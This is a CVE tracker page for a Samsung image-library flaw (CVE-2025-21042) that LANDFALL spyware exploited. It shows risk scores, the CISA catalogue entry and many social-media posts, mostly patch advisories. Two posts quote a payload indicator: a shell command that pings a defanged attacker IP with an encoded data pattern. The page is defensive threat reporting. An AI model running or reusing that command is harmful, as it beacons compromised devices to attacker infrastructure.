CVE-2025-21042

Published Sep 12, 2025

Last updated 5 months ago

Exploit knownCVSS high 8.8
libimagecodec
Samsung
Zero-day
Mobile device

Overview

Description
Out-of-bounds write in libimagecodec.quram.so prior to SMR Apr-2025 Release 1 allows remote attackers to execute arbitrary code.
Source
mobile.security@samsung.com
NVD status
Analyzed
Products
android

Risk scores

CVSS 3.1

Type
Primary
Base score
9.8
Impact score
5.9
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity
CRITICAL

Known exploits

Data from CISA

Vulnerability name
Samsung Mobile Devices Out-of-Bounds Write Vulnerability
Exploit added on
Nov 10, 2025
Exploit action due
Dec 1, 2025
Required action
Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Weaknesses

nvd@nist.gov
CWE-787

Social media

Hype score
Not currently trending

  1. Top 5 Trending CVEs: 1 - CVE-2026-2441 2 - CVE-2026-20700 3 - CVE-2026-2003 4 - CVE-2025-21042 5 - CVE-2025-59536 #cve #cvetrends #cveshield #cybersecurity https://t.co/4Fua3CAN6W

    @CVEShield

    26 Feb 2026

    182 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  2. A look at an Android ITW DNG exploit. Quram library exploit technical details (CVE-2025-21042) https://t.co/DvczPhO6JZ #infosec https://t.co/o7WF0vM8w7

    @0xor0ne

    4 Jan 2026

    5609 Impressions

    20 Retweets

    99 Likes

    47 Bookmarks

    2 Replies

    0 Quotes

  3. A look at an Android ITW DNG exploit CVE-2025-21042 Vulnerability In QuramDngOpcodeDeltaPerColumn::processArea (in https://t.co/Y1BDrvsNGY) Payload ioc: /system/bin/sh -c 'ping -c 1 -w1 -p 2066c1d8ce2834f1fbb1296f9dca73419 91.132.92[.]35 >/dev/null & ' https://t.co/menf2T

    @minacrissDev_

    16 Dec 2025

    267 Impressions

    0 Retweets

    2 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  4. #Malware #VulnerabilityReport Zero-Click Samsung Zero-Day (CVE-2025-21042) Delivered LANDFALL Spyware Via Malicious DNG Images https://t.co/5lF7HGEeYh

    @Komodosec

    15 Dec 2025

    9 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  5. A look at an Android ITW DNG exploit CVE-2025-21042 Vulnerability In QuramDngOpcodeDeltaPerColumn::processArea (in https://t.co/Y1BDrvsfRq) Payload ioc: /system/bin/sh -c 'ping -c 1 -w1 -p 2066c1d8ce2834f1fbb1296f9dca73419 91.132.92[.]35 >/dev/null & ' https://t.co/jHNG4C

    @minacrissDev_

    13 Dec 2025

    424 Impressions

    0 Retweets

    4 Likes

    5 Bookmarks

    0 Replies

    0 Quotes

  6. Unit 42 uncovers LANDFALL: Android spyware via WhatsApp DNG zero-day (CVE-2025-21042) on Samsung. Mid-2024 ops hit Middle East—full device surveillance. Patched; IOCs out. Vet images, update firmware. #CyberSec #Spyware https://t.co/cj3OwOrMsU

    @exc_actual

    29 Nov 2025

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  7. Des pirates ont exploité une faille de 0 Day (CVE-2025-21042) dans les téléphones Samsung Galaxy en utilisant une seule image WhatsApp malveillante pour obtenir un accès sans clic. Samsung a mis en place un correctif en avril 2025. Mettez-le à jour dès maintenant. https:/

    @BoxCyber27484

    23 Nov 2025

    0 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  8. Actively exploited CVE : CVE-2025-21042

    @transilienceai

    23 Nov 2025

    20 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  9. Actively exploited CVE : CVE-2025-21042

    @transilienceai

    22 Nov 2025

    17 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  10. “Dikkat! CL-UNK-1054 adlı casusluk grubu, CVE-2025-21042 ile Samsung cihazlarda Landfall casus yazılımı dağıtıyor. WhatsApp resime tıklamanız bile yetebilir! 👀 #SiberGüvenlik #CyberSec #BilgiGüvenliği #Hacker #Türkiye” https://t.co/p0gZ8H5u1R

    @siberdirenisTR

    21 Nov 2025

    3 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  11. Zero-Click-Angriffe nehmen rasant zu Die neuesten Sicherheitsupdates von Google, Apple & Samsung bestätigen: Angreifer nutzen Schwachstellen völlig unbemerkt aus – keine Klicks, keine Downloads, keine Warnungen. Samsungs CVE-2025-21042 ist nur ein Beispiel, das bereits a

    @KvinneGmbh

    18 Nov 2025

    13 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  12. 🚨 LANDFALL [Critical] Nov 18, 2025 LANDFALL is a sophisticated Android spyware targeting Samsung Galaxy devices, exploiting a zero-day vulnerability (CVE-2025-21042) in the https://t.co/YpgEURdsKY image processing library. The spyware is delivered via malicious DNG image https

    @transilienceai

    18 Nov 2025

    29 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  13. 🚨 Hackers Hijack Samsung via Image — One Photo. Zero Clicks. Full Control. A new cyberattack named LANDFAIL (CVE-2025-21042) has been discovered, targeting Samsung Galaxy devices (S22, S23, S24 & Z series running Android 13–15). Hackers exploited a zero-day flaw using

    @v3n0m30

    17 Nov 2025

    15 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  14. Hackers hijack Samsung via Image - One Photo , Zero Click. Full Control A new Cyberattack named LANDFAIL ( CVE-2025-21042) has been discovered, targeting Samsung Galaxy devices ( S22 , S23 , S24 & Z-seriesrumning Android 13-15) https://t.co/wseaOiWgN0

    @Itz_Real_Hari

    17 Nov 2025

    154 Impressions

    0 Retweets

    4 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  15. Actively exploited CVE : CVE-2025-21042

    @transilienceai

    17 Nov 2025

    18 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  16. .@CISAgov added a critical Samsung flaw (CVE-2025-21042) to its Known Exploited Vulnerabilities list after @Unit42_Intel revealed zero-day attacks deploying LANDFALL #spyware via WhatsApp on Samsung devices. #cybersecurity #CISO #infosec #ITsecurity https://t.co/t5wLdB7CKS

    @SCMagazine

    16 Nov 2025

    567 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  17. Actively exploited CVE : CVE-2025-21042

    @transilienceai

    16 Nov 2025

    23 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  18. 新たなスパイウェアLANDFALLがSamsung機器へのゼロデイ攻撃で使われる(CVE-2025-21042) https://t.co/nRw6oiorvA

    @GbeCbo8fNq69403

    15 Nov 2025

    5 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  19. 新たなスパイウェアLANDFALLがSamsung機器へのゼロデイ攻撃で使われる(CVE-2025-21042) | Codebook|Security News

    @GbeCbo8fNq69403

    15 Nov 2025

    7 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. Actively exploited CVE : CVE-2025-21042

    @transilienceai

    15 Nov 2025

    10 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  21. .@CISAgov added a critical Samsung flaw (CVE-2025-21042) to its Known Exploited Vulnerabilities list after @Unit42_Intel revealed zero-day attacks deploying LANDFALL #spyware via WhatsApp on Samsung devices. #cybersecurity #CISO #infosec #ITsecurity https://t.co/t5wLdB7CKS

    @SCMagazine

    14 Nov 2025

    478 Impressions

    1 Retweet

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  22. .@CISAgov added a critical Samsung flaw (CVE-2025-21042) to its Known Exploited Vulnerabilities list after @Unit42_Intel revealed zero-day attacks deploying LANDFALL #spyware via WhatsApp on Samsung devices. #cybersecurity #CISO #infosec #ITsecurity https://t.co/t5wLdB7CKS

    @SCMagazine

    13 Nov 2025

    462 Impressions

    3 Retweets

    2 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  23. 💡 كيف يستغلّ الهاكرز ثغرة في أجهزة Samsung للوصول إلى الهاتف وتشغيل Spyware؟ 🔹 الثغرة CVE-2025-21042 اكتشفت في المكتبة الخاصة بمعالجة الصور. بمجرد فتح صورة DNG خبيثة ي

    @xabdul

    13 Nov 2025

    4493 Impressions

    8 Retweets

    89 Likes

    60 Bookmarks

    4 Replies

    0 Quotes

  24. ⚠️ CVE-2025-21042 🖥️ Samsung Galaxy 0day vulnerability exploited by LandFall spyware 💬 allows attackers to remotely compromise Samsung devices, install spyware, and exfiltrate messages, calls, and app data 🔗 https://t.co/JNU7pQCL15 The flaw enables privilege esca

    @ransomnews

    13 Nov 2025

    218 Impressions

    0 Retweets

    3 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  25. Unit 42が、Samsung製Androidの画像ライブラリのゼロデイ脆弱性CVE-2025-21042を悪用する未知のAndroidスパイウェア「LANDFALL」を発見。 これは本キャンペーンとインプラントに関する初の公開分析です。 詳細はこちら: h

    @unit42_jp

    13 Nov 2025

    1019 Impressions

    4 Retweets

    8 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  26. #threatreport #MediumCompleteness CVE-2025-21042: Samsung Galaxy Zero-Day Exploited in LANDFALL Spyware Campaign | 12-11-2025 Source: https://t.co/smuVhp2om3 Key details below ↓ 💀Threats: Landfall, 🎯Victims: Mobile users, Samsung galaxy users 🏭Industry: Government

    @rst_cloud

    13 Nov 2025

    73 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    1 Reply

    0 Quotes

  27. Zero-click Samsung flaw (CVE-2025-21042) used to deliver LANDFALL spyware via WhatsApp images — can exfiltrate calls, mic, photos & location. Update your Galaxy now and heed vendor patches. 🔗 https://t.co/SpNNCvpSXO #MobileSecurity #Android #spyware https://t.co/L3EAQqix

    @sctocs25

    12 Nov 2025

    1 Impression

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  28. 🔐🪟 SIGNALS WEEKLY: Keys. Gates. Windows. Actively exploited Win kernel EoP ✅ (CVE-2025-62215). Cisco RA-VPN bugs can reload unpatched edges. LANDFALL used Samsung’s image bug (CVE-2025-21042). Which breaks first in your shop? Read -> https://t.co/JrOdxeJL8a #Alph

    @alphahunt_io

    12 Nov 2025

    43 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  29. ⚠️Vulnerabilidad en productos Samsung ❗CVE-2025-21042 ➡️Más info: https://t.co/GDQrivAMkd https://t.co/hbSwtHiE12

    @CERTpy

    12 Nov 2025

    81 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  30. 🛡️ LandFall Casus Yazılım Kampanyası: Samsung Galaxy Cihazlarını Hedef Alan Yeni 0-Day Tehdidi Siber güvenlik araştırmacıları, Samsung Galaxy cihazlarını hedef alan ve hâlihazırda aktif olarak istismar edilen kritik bir güvenlik açığını ortaya çıkardı

    @ahmetgulerpy

    12 Nov 2025

    0 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  31. A severe flaw (CVE-2025-21042) in Samsung’s image library lets hackers use .DNG files to install LANDFALL spyware on Galaxy S22, S23, S24 & Z Fold/Flip 4. 📱 Updated since April 2025? You’re safe. 👉 Go to Settings > Software update > Download and install #Cyber

    @sowravu_suresh

    12 Nov 2025

    29 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  32. انتشار آسیب پذیری از نوع RCE با کد شناسایی CVE-2025-21042 در گوشی های سامسونگ . علت آسیب پذیری وجود ضعف در یکی از library ها به نام libimagecodec می باشد. برای امن سازی گوشی سا

    @EthicalSafe

    11 Nov 2025

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  33. 📝 𝐏𝐚𝐭𝐜𝐡 𝐧𝐨𝐰: 𝐒𝐚𝐦𝐬𝐮𝐧𝐠 𝐳𝐞𝐫𝐨-𝐝𝐚𝐲 𝐥𝐞𝐭𝐬 𝐚𝐭𝐭𝐚𝐜𝐤𝐞𝐫𝐬 𝐭𝐚𝐤𝐞 𝐨𝐯𝐞𝐫 𝐲𝐨𝐮𝐫 𝐩𝐡𝐨𝐧𝐞 • CVE-2025-21042 is actively exploited as a zero-da

    @PurpleOps_io

    11 Nov 2025

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  34. CISA: Patch Samsung flaw exploited to deliver spyware (CVE-2025-21042) https://t.co/gMJRzqqVYC #HelpNetSecurity #Cybersecurity https://t.co/zMw3DEisgw

    @PoseidonTPA

    11 Nov 2025

    31 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  35. KEVに追加されたCVE-2025-21042/LANDFALL事件は、ゼロクリック攻撃 × 民間スパイウェア × メディア処理の脆弱性という新たな組み合わせの脅威モデルを提示しました。 https://t.co/yhASckIjJd Samsung端末を利用する組織は

    @t_nihonmatsu

    11 Nov 2025

    705 Impressions

    1 Retweet

    6 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  36. csirt_it: ‼️ #Exploited: rilevato lo sfruttamento attivo in rete della vulnerabilità CVE-2025-21042, che interessa dispositivi #Samsung con S.O. #Android Rischio: 🟠 Tipologia: 🔸 Arbitrary Code Execution 🔗https://t.co/7x1H9nCNOZ ⚠️ Importante… https:/

    @Vulcanux_

    11 Nov 2025

    20 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  37. 🚨 CVE-2025-21042 Out-of-bounds write in https://t.co/IevH2sfTwf prior to SMR Apr-2025 Release 1 allows remote attackers to execute arbitrary code. #InfoSec #CyberSec #CyberSecurity

    @AnonOzzyDude

    11 Nov 2025

    8 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  38. Android-Spionage: Neue Malware LANDFALL zielt auf Samsung-Geräte ab Forscher von Unit 42 haben eine bisher unbekannte Android-Spyware namens LANDFALL identifiziert, die gezielt Samsung-Geräte angreift. Die Malware wurde über eine Zero-Day-Sicherheitslücke (CVE-2025-21042) in

    @tec4net

    11 Nov 2025

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  39. 🚨 Samsung RCE Alert (CVE-2025-21042) Out-of-bounds write in https://t.co/wylhIwA1Xc lets attackers run code on Samsung devices (Android 13+). CVSS 9.8 — patch now! 🔗 https://t.co/1jwf5oPSOl #CyberSecurity #ZeroDay #PatchNow #mobilesecurity

    @PMinister12

    11 Nov 2025

    0 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  40. ⚡️ Cybersecurity Developments in the Last 12 Hours ⚡️ 🚨 CISA ordered federal agencies to patch a critical Samsung zero-day (CVE-2025-21042) exploited to deliver LandFall spyware via malicious DNG images, impacting multiple Galaxy flagship models. 👾 Microsoft resea

    @greytech_ltd

    11 Nov 2025

    46 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  41. Latest Known Exploited Vulnerabilities (#KEV) : #CVE-2025-21042 #Samsung Mobile Devices Out-of-Bounds Write Vulnerability https://t.co/WUmwUhUZNm

    @ScyScan

    10 Nov 2025

    8 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  42. 🛡️ We added Samsung mobile devices out-of-bounds write vulnerability CVE-2025-21042 to our Known Exploited Vulnerabilities Catalog. Visit https://t.co/myxOwap1Tf & apply mitigations to protect your org from cyberattacks. #Cybersecurity #InfoSec https://t.co/H5lyCxzwJy

    @CISACyber

    10 Nov 2025

    7580 Impressions

    25 Retweets

    78 Likes

    10 Bookmarks

    2 Replies

    0 Quotes

  43. یک آسیب‌پذیری امنیتی در دستگاه‌های اندروید سامسونگ گلکسی که اکنون رفع شده، به عنوان zero-day برای توزیع بدافزار جاسوسی اندروید با نام LANDFALL در حملات هدفمند د

    @Teeegra

    10 Nov 2025

    3695 Impressions

    3 Retweets

    28 Likes

    7 Bookmarks

    0 Replies

    1 Quote

  44. Le spyware Landfall a infecté pendant près d’un an certains Samsung Galaxy via la vulnérabilité zero-day CVE-2025-21042, permettant un accès furtif aux données, au micro et à la localisation. https://t.co/hr45tiNVOm

    @cert_ist

    10 Nov 2025

    35 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  45. ⚠️ Samsung Galaxy users update now! • New zero-click spyware “LANDFALL” spreading via WhatsApp • Exploits hidden flaw (CVE-2025-21042) in Galaxy S22–S24, Z Fold 4 & Flip 4 • Hackers can access your mic, photos & chats no clicks needed • Fix already roll

    @TechAI_Daily

    10 Nov 2025

    75 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  46. A zero-day (CVE-2025-21042, CVSS 9.8) in #SamsungGalaxy devices was exploited to deploy #LANDFALL spyware via malicious DNG images. The flaw in libimagecodec.quram[.]so enables RCE, granting full device compromise. Linked to Stealth Falcon infrastructure. https://t.co/4EP9tC8x2c

    @MeridianEU

    10 Nov 2025

    6 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  47. Unit 42 uncovers the new LANDFALL Android spyware delivered as DNG images that exploit CVE-2025-21042 in Samsung devices. https://t.co/qFWkEUFMxC https://t.co/B3t7lmnlWT

    @virusbtn

    10 Nov 2025

    3032 Impressions

    13 Retweets

    51 Likes

    5 Bookmarks

    1 Reply

    2 Quotes

  48. 📲 @SamsungMobile patched a flaw (CVE-2025-21042) used to deploy LANDFALL Android spyware. Attackers exploited the zero-day via malicious DNG images sent over WhatsApp, targeting Galaxy S22–S24 devices. Stay aware. Follow @TechNadu for factual cybersecurity coverage. https:/

    @TechNadu

    10 Nov 2025

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  49. 🚨 Samsung Zero-Day (CVE-2025-21042) Allows spyware install via malicious image (RCE). Affects: S22-S24, Fold4, Flip4. Fix: April 2025 update. Patch NOW. Full breakdown on LinkedIn: https://t.co/BAw7lmj2Un #Cybersecurity #Android #ZeroDay

    @damzydevsec

    10 Nov 2025

    20 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  50. 三星Galaxy手机曝“零点击”漏洞,黑客利用图片攻击,CVE-2025-21042,影响S22-S24等机型,三星已发布安全补丁。 #三星Galaxy #零点击攻击 #Landfall漏洞 https://t.co/XGxHjaeAQe

    @guijitoutiao

    10 Nov 2025

    19 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations

Related CVEs

  1. Improper check for exceptional conditions in Device Care prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Knox Guard.CVE-2026-21007
  2. Improper input validation in Retail Mode prior to SMR Apr-2026 Release 1 allows local attackers to trigger privileged functions.CVE-2026-21010
  3. External control of file name in AODManager prior to SMR Apr-2026 Release 1 allows privileged local attacker to create file with system privilege.CVE-2026-21012
  4. Improper access control in Samsung DeX prior to SMR Apr-2026 Release 1 allows physical attackers to access to hidden notification contents.CVE-2026-21006
  5. Incorrect privilege assignment in Bluetooth in Maintenance mode prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Extend Unlock.CVE-2026-21011

References

Sources include official advisories and independent security research.